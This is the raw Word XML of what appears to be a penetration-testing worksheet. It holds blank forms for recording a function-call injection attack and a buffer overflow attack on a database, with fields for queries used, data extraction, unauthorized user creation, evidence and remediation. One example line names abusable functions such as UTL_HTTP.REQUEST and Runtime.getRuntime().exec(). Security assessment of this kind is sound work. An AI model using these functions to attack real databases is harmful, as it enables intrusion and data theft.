                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform a Function-Call Injection Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DEABCCC" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="00843719" w:rsidRDefault="003E6652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98"/>
        <w:gridCol w:w="3431"/>
        <w:gridCol w:w="3431"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w14:paraId="2F0DFB4D" w14:textId="77777777" w:rsidTr="00843719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33044412" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF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45B44027" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="4F215EC8" w14:textId="77777777" w:rsidTr="00843719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466E785D" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF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170C54E4" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="09E85D99" w14:textId="77777777" w:rsidTr="00843719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4E3E0216" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF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3BE2E141" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="45B73DBE" w14:textId="77777777" w:rsidTr="00843719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325B6809" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF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Custom or Database </w:t>
            </w:r>
            <w:r w:rsidRPr="000A0EDF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Functions Used to Perform SQL Injection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77B2F69C" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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7ABBA9B" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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2229093" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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310F6BA" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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CD5EE34" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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62006F1" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="5779649C" w14:textId="77777777" w:rsidTr="00843719">
        <w:trPr>
          <w:trHeight w:val="1709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21C874F9" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Queries Used to Perform SQL Injection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223C2ADB" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="157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944E873" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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3967C43" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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F29F32E" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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762E136" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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766A29F" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="08F2181B" w14:textId="77777777" w:rsidTr="00843719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67158D03" w14:textId="41C1604E" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="0067393E" w:rsidP="0084371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7393E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Function-Call Injection Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40CF8BD9" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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0A0EDF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7534E2EA" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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0A0EDF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067393E" w:rsidRPr="000A0EDF" w14:paraId="2E2428E5" w14:textId="77777777" w:rsidTr="00843719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5FA9946E" w14:textId="4B99BC14" w:rsidR="0067393E" w:rsidRPr="0067393E" w:rsidRDefault="0067393E" w:rsidP="0084371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7393E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scenario 1: Data Extraction Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07B03899" w14:textId="008A3E9E" w:rsidR="0067393E" w:rsidRPr="000A0EDF" w:rsidRDefault="0067393E" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E7809FF" w14:textId="18BA164C" w:rsidR="0067393E" w:rsidRPr="000A0EDF" w:rsidRDefault="0067393E" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067393E" w:rsidRPr="000A0EDF" w14:paraId="28BD4929" w14:textId="77777777" w:rsidTr="00843719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08DEDC5A" w14:textId="3CAEE504" w:rsidR="0067393E" w:rsidRPr="0067393E" w:rsidRDefault="0067393E" w:rsidP="0084371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7393E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scenario 2: Unauthorized User Creation Possible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68B81F17" w14:textId="6950BD5E" w:rsidR="0067393E" w:rsidRDefault="0067393E" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A8DB09C" w14:textId="4822B15E" w:rsidR="0067393E" w:rsidRDefault="0067393E" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00920003" w:rsidRPr="000A0EDF" w14:paraId="5AEEEA90" w14:textId="77777777" w:rsidTr="00843719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40BC00E4" w14:textId="7A73ED04" w:rsidR="00920003" w:rsidRPr="000A0EDF" w:rsidRDefault="00920003" w:rsidP="0084371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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23D9AD4C" w14:textId="77777777" w:rsidR="00920003" w:rsidRDefault="00920003" w:rsidP="0092000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81ADCC7" w14:textId="77777777" w:rsidR="00920003" w:rsidRDefault="00920003" w:rsidP="0092000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283876C" w14:textId="77777777" w:rsidR="00920003" w:rsidRPr="000A0EDF" w:rsidRDefault="00920003" w:rsidP="0092000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7393E" w:rsidRPr="000A0EDF" w14:paraId="3655D809" w14:textId="77777777" w:rsidTr="00843719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503ABD2C" w14:textId="23F22F31" w:rsidR="0067393E" w:rsidRDefault="0067393E" w:rsidP="0084371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7393E"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 Vulnerable Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39EF1FC4" w14:textId="77777777" w:rsidR="0067393E" w:rsidRPr="0067393E" w:rsidRDefault="0067393E" w:rsidP="0092000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7393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[*e.g., UTL_HTTP.REQUEST, adduser(), Runtime.getRuntime().exec()]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78783352" w14:textId="2EF69593" w:rsidR="0067393E" w:rsidRDefault="0067393E" w:rsidP="0092000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7190D" w:rsidRPr="000A0EDF" w14:paraId="10B1A26D" w14:textId="77777777" w:rsidTr="00843719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3385BE0D" w14:textId="44F97D93" w:rsidR="00D7190D" w:rsidRPr="0067393E" w:rsidRDefault="00D7190D" w:rsidP="0084371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7190D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Security Controls Present?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4250F174" w14:textId="77777777" w:rsidR="00D7190D" w:rsidRDefault="00D7190D" w:rsidP="0092000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D7190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Restrictions Observed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64B5FF2" w14:textId="77777777" w:rsidR="00D7190D" w:rsidRDefault="00D7190D" w:rsidP="0092000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CD8B557" w14:textId="5AB6CB65" w:rsidR="00683291" w:rsidRPr="0067393E" w:rsidRDefault="00683291" w:rsidP="0092000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20003" w:rsidRPr="000A0EDF" w14:paraId="478B64FB" w14:textId="77777777" w:rsidTr="00843719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591B0C02" w14:textId="582B9199" w:rsidR="00920003" w:rsidRDefault="00920003" w:rsidP="0084371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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F76DF91" w14:textId="77777777" w:rsidR="00920003" w:rsidRPr="00920003" w:rsidRDefault="00920003" w:rsidP="0092000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92000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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D61BA00" w14:textId="77777777" w:rsidR="00920003" w:rsidRDefault="00920003" w:rsidP="0092000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DA895E5" w14:textId="77A844D5" w:rsidR="00920003" w:rsidRDefault="00920003" w:rsidP="0092000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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="11285FF4" w14:textId="77777777" w:rsidTr="00843719">
        <w:trPr>
          <w:trHeight w:val="1466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4A938944" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Information Extracted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1905DE28" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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7190D" w:rsidRPr="000A0EDF" w14:paraId="4183129A" w14:textId="77777777" w:rsidTr="00843719">
        <w:trPr>
          <w:trHeight w:val="1529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0852737A" w14:textId="09328CB8" w:rsidR="00D7190D" w:rsidRPr="000A0EDF" w:rsidRDefault="00D7190D" w:rsidP="0084371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D7190D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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5E24B6BB" w14:textId="77777777" w:rsidR="00D7190D" w:rsidRPr="000A0EDF" w:rsidRDefault="00D7190D" w:rsidP="000A0ED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7190D" w:rsidRPr="000A0EDF" w14:paraId="4B75597D" w14:textId="77777777" w:rsidTr="00843719">
        <w:trPr>
          <w:trHeight w:val="1250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79F772AF" w14:textId="36D72F28" w:rsidR="00D7190D" w:rsidRDefault="00D7190D" w:rsidP="0084371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Remediation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24F7A4AD" w14:textId="77777777" w:rsidR="00D7190D" w:rsidRPr="000A0EDF" w:rsidRDefault="00D7190D" w:rsidP="000A0ED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A0EDF" w:rsidRPr="000A0EDF" w14:paraId="3D16A2FE" w14:textId="77777777" w:rsidTr="00843719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54F5C8B0" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="0084371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A0EDF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7420F8DA" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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FF7B922" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="156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D862398" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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E105AAF" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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473A498" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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37E3DD4" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="000A0EDF" w:rsidRDefault="000A0EDF" w:rsidP="000A0ED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51641A02" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRDefault="00272F1E" w:rsidP="00272F1E">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08469B6B" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRPr="00B07F1E" w:rsidRDefault="00272F1E" w:rsidP="00272F1E">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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2F1E" w:rsidRPr="005D2C80" w14:paraId="47A4180E" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C4FF70" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRPr="005D2C80" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B881B90" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRPr="005D2C80" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F966623" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37D92C40" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D48538A" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02A51F2C" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C43A599" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21835D6E" w14:textId="77777777" w:rsidR="00272F1E" w:rsidRPr="005D2C80" w:rsidRDefault="00272F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69185CFC" w14:textId="1C032BFD" w:rsidR="001943CB" w:rsidRDefault="001943CB" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BB4CCC" w14:textId="77777777" w:rsidR="001943CB" w:rsidRDefault="001943CB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w: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196D57" w:rsidRPr="00A51A96" w14:paraId="185A89F8" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="390F3B16" w14:textId="19F65443" w:rsidR="00196D57" w:rsidRPr="003C713F" w:rsidRDefault="00196D57" w:rsidP="00972D9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7.17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196D57">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform a Buffer Overflow Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="568AB6D7" w14:textId="77777777" w:rsidR="000A0EDF" w:rsidRPr="009B15B8" w:rsidRDefault="000A0EDF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78"/>
        <w:gridCol w:w="3179"/>
        <w:gridCol w:w="3503"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w14:paraId="2A54DDB4" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FF9EAE9" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB9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682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B5E667" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008B3FB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B3FB9" w:rsidRPr="008B3FB9" w14:paraId="1109F155" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14CA0588" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB9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682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2542DC4B" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008B3FB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B3FB9" w:rsidRPr="008B3FB9" w14:paraId="03443AFA" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="457BF350" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB9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682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F322F0F" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008B3FB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B3FB9" w:rsidRPr="008B3FB9" w14:paraId="6AD9319C" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B974B34" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB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Standard Database Functions </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3FB9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that  </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>are Liable to Buffer Overflow Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262D078D" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="158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88767CB" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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DA599BB" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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507839D" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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C50C813" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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218308F" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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50BA581" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008B3FB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47E24" w:rsidRPr="008B3FB9" w14:paraId="4D440BDB" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D22C226" w14:textId="0C054E56" w:rsidR="00447E24" w:rsidRPr="008B3FB9" w:rsidRDefault="00447E24" w:rsidP="009B15B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447E24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Injection Payload Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
